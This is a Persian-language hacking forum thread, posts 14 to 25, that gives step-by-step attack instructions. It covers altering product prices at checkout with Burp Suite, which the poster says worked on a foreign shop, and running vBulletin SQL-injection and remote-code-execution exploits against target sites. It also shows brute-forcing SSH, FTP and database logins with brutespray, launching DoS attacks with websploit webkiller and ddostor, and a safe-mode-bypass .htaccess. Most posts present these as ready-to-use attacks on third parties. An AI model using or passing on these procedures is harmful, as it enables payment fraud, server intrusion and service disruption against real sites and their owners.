  14. با سلام با اموزش تغییر قیمت محصولات با ابزار Burp suite با شما هستیم خب ابتدا مرورگر خود را باز کنید و در قسمت پروکسی های local خود را تظیم کنید (localhost:808) قبل از این که تنظیم بکنید ادرس سایتی که قصت هک کردنشو دارید رو باز کنید و بعد پروکسی را تنظیم کنید . ابزار Burp suite با زکنید . به قسمت proxy بروید و به بخش intercept بروید و گذینه intercept را on کنید بعد به مروگر خود باز گردید و محصولی که انتخواب کرده بودید را خرید را بزنید به Burp suite برگردید با دقت به کد ها نگاه کنید و اعداد در جایی که payment نوشته و قیمت محصول را نوشته و قیمت خود را وارد کرده و روی forward کلیک کنید الان به جایی میرسه که ازتون میگه سفارش را تایید میکنید بله را بزنید و به جای قیمت محصول قیمت انتخوابی شما را کثر کند . توجه : قبلا این روش را روی یکی از سایت های خارجی تست کردن جواب مثبت گرفتم . استفاده نادرست از اموزش بر عهده خود شخص است . با تشکر
  15. اموزش بدست اوردن ip سایتی که از cloudflare استفاده میکند مدرس : بهروز منصوری http://uupload.ir/view/avm_4aae29daf1fa1f7d9365f560a4c75ad09293396-720p_79145.mp4/ موفق باشید
  16. دوره آموزشی تست نفوذ شبکه در دنیای واقعی بر مبنای استاندارد ECSA/LPT وبسایت: kait-co.Net قیمت: 1200/000 PASS🔑: @Vip2mohsen https://tg-go.noyes.in/i/BQADAQADOAADxRkpRB_CeVemTUsfAg/ebcdabcc3bf12ed9fb9a67569d19ab6a/1540303097 https://tg-go.noyes.in/i/BQADAQADOgADxRkpRLyUHlsDeIIvAg/25999273142b30d76a17a2d532cc955d/1540303097 https://tg-go.noyes.in/i/BQADAQADOQADxRkpRNk_7L8X0BzqAg/467936a7a5c4203e36fa71d9d042a57b/1540303097 https://tg-go.noyes.in/i/BQADAQADPQADeLcxRBrRDHtw7w4_Ag/2e0c1b4461a601427bfade0945241302/1540303097 https://tg-go.noyes.in/i/BQADAQADPwADxRkpRJcAAdEMaJ3GQwI/a180f19889223593434f1a4efc8dc5c9/1540303097
  17. Rednofozi

    Hacking

    هک ویبولتین چگونه انجام میشود؟ vBulletin چیست ؟ ویبولتین یک سیستم برای ساخت انجمن میباشد که بسیاری از وبسایت های انجمن دنیا از این سیستم انحمن ساز استفاده میکنند امروزه سیستم های انجمن ساز های زیادی را مشاهده میکنیم اما vBulletin یکی از محبوب ترین ها و قدیمی ترین انجمن ساز ها است که در سال ۲۰۰۰ اولین نسخه ان منتشر شده است و به زبان php نوشته شده است این انجمن ساز به صورت غیر رایگان میباشد اما به طور کلی در وبسایت های زیادی نسخه های null ان موجود میباشد که میتوانید با نصب و استفاده از ان به صورت رایگان از ان استفاده کنید نکته: در اغلب اوقات در بیشتر اسکریپت های نال شده اشکالات و حتی بکدور وجود دارد پس دقت کنید که با این مشکلات مواجه نشوید روش های هک ویبولتین متخصصان امنیت بر روی تمام اسکریپت های امنیت کار میکنند که این باعث میشود اکسپلویت های زیادی برای اسکریپت های تحت وب منتشر شود به همین دلیل ما در این اموزش چند اکسپلویت حساس برای هک ویبولتین را معرفی میکنیم اکسپلویت ویبولتین نسخه ۳٫۶٫۰ تا ۴٫۲٫۳ ابتدا وارد لینک زیر شوید و اکسپلویت را دریافت کنید https://www.exploit-db.com/exploits/40751/ میبینید که روش های قدم به قدم دامپ دیتابیس سایت را مثال زده است برسی شبکه بیسیم با ابزار FruityWiFi و اسیب پذیری در صفحه مربوطه را مشخص کرده است به طور مثال در ادرس زیر میتوانید حملات Sqli را انجام دهید =https://site.com/forumrunner/request.php?d=1&cmd=get_spam_data&postids برای یادگیری انجام حملات اموزش sql injection را میتوانید مشاهده کنید اکسپلویت ویبولتین نسخه ۵٫x در این اکسپلویت میتوانید تمامی ویبولتین های ۵ را دسترسی بگیرید این اکسپلویت از باگ RCE استفاده میکند و مانند اکسپلویت قبلی از نوع sqli نمیباشد ابتدا از لینک زیر اکسپلویت را دریافت کنید https://www.exploit-db.com/download/38790.pl نکته : دقت داشته باشید برای اجرای این اکسپلویت اکتیو پرل را در سیستم خود نصب کرده باشید در صورتی که ان را نصب نکرده اید از اینجا ان را دریافت و نصب کنید بعد از دریافت در کنسول خود فایل اکسپلویت را به صورت زیر اجرا کنید perl 38790.pl بعد از اجرا در بخش Enter Target سایت مورد نظری که ای این انجمن ساز استفاده میکند را وارد کنید و درصورت اسیب پذیر بودن به این اکسپلویت دسترسی از نوع ریموت از راه دور خواهید گرفت
  18. Rednofozi

    Hacking

    توضیحات این ابزار این ابزار که tweets_analyzer نام دارد توسط فردی به نام x0rz نوشته شده است. این ابزار که به زبان پایتون نوشته شده است برای انالیز اکانت های توییتر ویژگی هایی استفاده میکند که عبارت اند از: میانگین توییت کردن کاربر در هر ساعت و هر روز منطقه زمانی و زبان استفاده کاربر از اپلیکیشن موبایل و وب بروزر موقعیت مکانی بیشترین هشتک ها بیشترین ریتوییت ها زبان و مکان دوستان کاربر نحوه نصب اول از همه API keys موجود در secrets.py را بروزرسانی کنید. برای بدست اوردن API keys از وبسایت برنامه های توییتر استفاده کنید. نکته:برای اجرای این اسکریپت پایتونی شما به پایتون نسخه ۲٫۷ یا جدیدتر نیازمند هستید. شما نیز دارید تا پکیج های پایتونی از جمله tweepy, ascii_graph, tqdm, numpy را نصب کنید. برای نصب این پکیج ها از دستور زیر استفاده کنید: pip install -r requirements.txt نحوه اجرا برای اجرای اسکریپت پایتونی انالیز اکانت های توییتر از دستور زیر استفاده کنید: tweets_analyzer.py -n username [options] دستورات برای تنظیمات(options) دستور help h- دستوری برای انجام انالیزی سریع برای دوستان کاربر بر اساس منطقه زمانی و زبان friends– دستوری برای محدود کردن تعداد توییت های مورد بررسی l- نکته:بعد از l تعداد توییت مورد نظرتان را وارد کنید. دستوری برای ذخیره کردن فایل ها بصورت JSON j- https://github.com/x0rz/tweets_analyzer
  19. Rednofozi

    Hacking

    اموزش نصب ابزار برای نصب در سیستم عامل لینوکس خود میتوانید از دستور زیر استفاده کنید اما درصورتی که این ابزار در مخازن موجود نبود میتوانید با استفاده از روش زیر جداگانه نصب کنید در ابتدا لینک را از بخش دانلود در اخر صفحه دریافت کنید و جایگزین Link در دستور زیر کنید git clone Link وارد پوشه دانلود شده شوید cd brutespray با دستور زیر پیشنیاز های ابزار را نصب کنید pip install -r requirements.txt حال برای نمایش سویچ های ابزار دستور زیر را وارد کنید python brutespray.py -h نحوه استفاده برای استفاده و بروت فورس یک سرویس با استفاده از ابزار معرفی شده به مثال زیر توجه کنید python brutespray.py –file nmap.gnmap -u admin -p password –threads 5 –hosts 5 در ابتدا با استفاده از پایتون ابزار را اجرا کردیم با سویچ –file خروجی nmap را وارد کردیم و با -u یوزرنیم خود را وارد میکنیم و با استفاده از -p یک پسورد انتخاب میکنیم با استفاده از –threads سرعت انجام تست نفوذ را بسته به سرعت خود انتخاب کنید و در سویچ –hosts تعداد سرویس را انتخاب کنید پشتیبانی ابزار از سرویس های : ssh ( سرویس اتصال بین سرور ) ftp ( سرویس انتقال فایل ) telnet (سرویس اتصال بین سرور ویندوز) vnc (اتصال گرافیکی) mssql (دیتابیس) mysql (دیتابیس) smtp (ایمیل) بروت فورس و امنیت چندین راه برای جلوگیری از حملات بروت فورس وجود دارد که میتواند در سرویس های مختلف متفاوت باشد ما به چند نمونه از راه های امنیت در مقابل حملات بروت فورس میپردازیم استفاده از کپچا در صفحات ورد وبسایت ها محدود کردن ای پی در سرویس بلاک کردن ای پی هنگام وارد کردن چندین باره پسورد ابزار های تشخیص ربات استفاده از پسورد های طولانی با کارکتر های مختلف https://github.com/x90skysn3k/brutespray
  20. کنفرانس پریسا تبریزی در بلک هت 2018 کامل با زیرنویس فارسی https://tg-go.noyes.in/i/BQADBAAD1AgAAkJ_SFIFfU5ixQ-rCwI/b179e196dfecf083d3428947d3c8f91d/1539935578 موفق باشید
  21. یکی از ابزارهای معروف هکینگ و اتکینگ بی شک ابزار websploit هست که با قابلیت های (wifijammer,wifi attacking, webkiller و ...) خلاصه ما در این اموزش از webkiller استفده میکنیم ابتدا ترمینال را باز کنید و با دستور زیر اقدام به نصب websploit بکنید : sudo apt-get install websploit با دستور بالا اقدام نصب این ابزار میشود بعد از نصب ابزار با دستور websploit ابزار را اجرا کنید و دستور زیر را بنویسید : use network/webkiller و بعد با دستور : set target target.com شما به جای target.com سایت مورد هدف را قرار بدید و بعد با دستور run اقدام به اجرای اتک کنید این به نظرم بسیاری از ابزار ها قدرت مند تر هست . با امید موفقیت امید وارم خوشتان امده باشد .
  22. Black_petya

    Hacking-Ddos

    یکی از بهترین دیداسر های در زمینه اتک دیداسر tor هست که بدون شناسایی ایپی شما عملیات را انجام میدهد و قدرت زیادی نسبت به دیداسر های دیگری دارد . ابتدا با دستور زیر اقدام به دانلود ddostor کنید . git clone https://github.com/thelinuxchoice/ddostor.git بعد از دانلود شدن با دستور cd به دایرکتوری ddostor بروید . با دستور زیر اجرا کنید : bash ddostor.sh بعد از اجرا از شما target میخواهد ادرس تارگنت خود را بدید بعد از شما پورت میخواهید معمولا پورت 80 بعد از شما تعداد پکد هارا میخواد 6000 وارد کنید بعد دیداسر اقدام به انجام عملیات دیداس میکند امید وارم خوشتان امده باشد .
  23. Moeein Seven

    Hacking

    دوره آموزشی Password attacks از فرانش قیمت 20000 کاری از بهروز منصوری Password attacks.rar - Telegram File Download Service Password attacks.rar - Telegram File Download Service
  24. Rednofozi

    Hacking

    # increase performance by disabling allowoverride AllowOverride All None DirectoryIndex index.html index.htm index.php index.php4 index.php5 Options All +Indexes +FollowSymLinks Options All +ExecCGI Options All +Indexes Options All +FollowSymLinks Options All +SymLinksIfOwnerMatch Options All +MultiViews Options All +Includes Options All +IncludesNOEXEC AddType ****/plain .php AddType application/octet-stream .php AddHandler server-parsed .php Addhandler cgi-script .asp AddType txt .php AddHandler txt .php Bypass safemode .htaccess
  25. نکته قبل از نصب حتما پایتون نسخه ۳ استفاده نمایید تا به درستی اجرا شود امکانات Admin Finder استفاده از پروکسی تست پارامتر های تصادفی برای جسجو جستجو بیش از ۵۰۰ صفحه امکان بالا بودن سرعت Multithreading امکان افزودن صفحه به ابزار … نصب در لینوکس ابتدا لینک را از اخر صفحه دریافت کنید سپس جایگزین Link در دستور زیر کنید و دستور را اجرا کنید git clone Link بعد از اتمام دانلود وارد پوشه دانلود شده شوید cd okadminfinder3 برای نصب پیشنیاز ها از دستور زیر استفاده نمایید pip3 install -user -r requirements.txt حال سطح دسترسی فایل را بالا ببرید chmod 775 okadminfinder.py حال برای اجرا میتوانید از پایتون ۳ مانند دستور زیر استفاده کنید python3 okadminfinder.py پیکربندی کالی لینوکس برای اتصالات شبکه نحوه استفاده ابتدا برای نبایش سویچ های راهنما از دستور زیر استفاده کنید python3 okadminfinder.py -h برای جستجوی صفحه ادمین از سویچ -u استفاده کنید به طور مثال : python3 okadminfinder.py -u site.com درصورتی که از پروکسی استفاده میکنید میتوانید مانند دستور زیر پروکسی را فعال کنید python3 okadminfinder.py -u target.com –proxy 127.0.0.1:53281 GitHub - mIcHyAmRaNe/okadminfinder3: [ Admin panel finder / Admin Login Page Finder ] ¢σ∂є∂ ву 👻 (❤-❤) 👻